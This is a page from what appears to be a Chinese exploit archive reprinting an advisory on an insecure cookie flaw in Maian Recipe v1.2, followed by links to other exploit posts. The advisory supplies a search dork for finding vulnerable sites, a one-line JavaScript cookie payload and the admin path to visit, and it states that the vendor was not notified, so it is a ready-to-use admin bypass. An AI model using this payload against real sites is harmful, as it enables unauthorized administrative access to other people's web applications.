手机
当前位置:查字典教程网 >网络安全 >Exploit >Maian Recipe
Maian Recipe
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by: Maian Recipe v1.2

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Recipe suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "recipe_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Recipe <= v1.2 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Recipe】相关文章:

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

MS Internet Explorer (FTP Server Response) DoS Exploit

Maian Uploader

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

Poppler

Maian Search

webEdition CMS (we_objectID) Blind SQL Injection Exploit

Linux Kernel

Mole Group Last Minute Script

WS_FTP Home/Professional FTP Client Remote Format String PoC

精品推荐
分类导航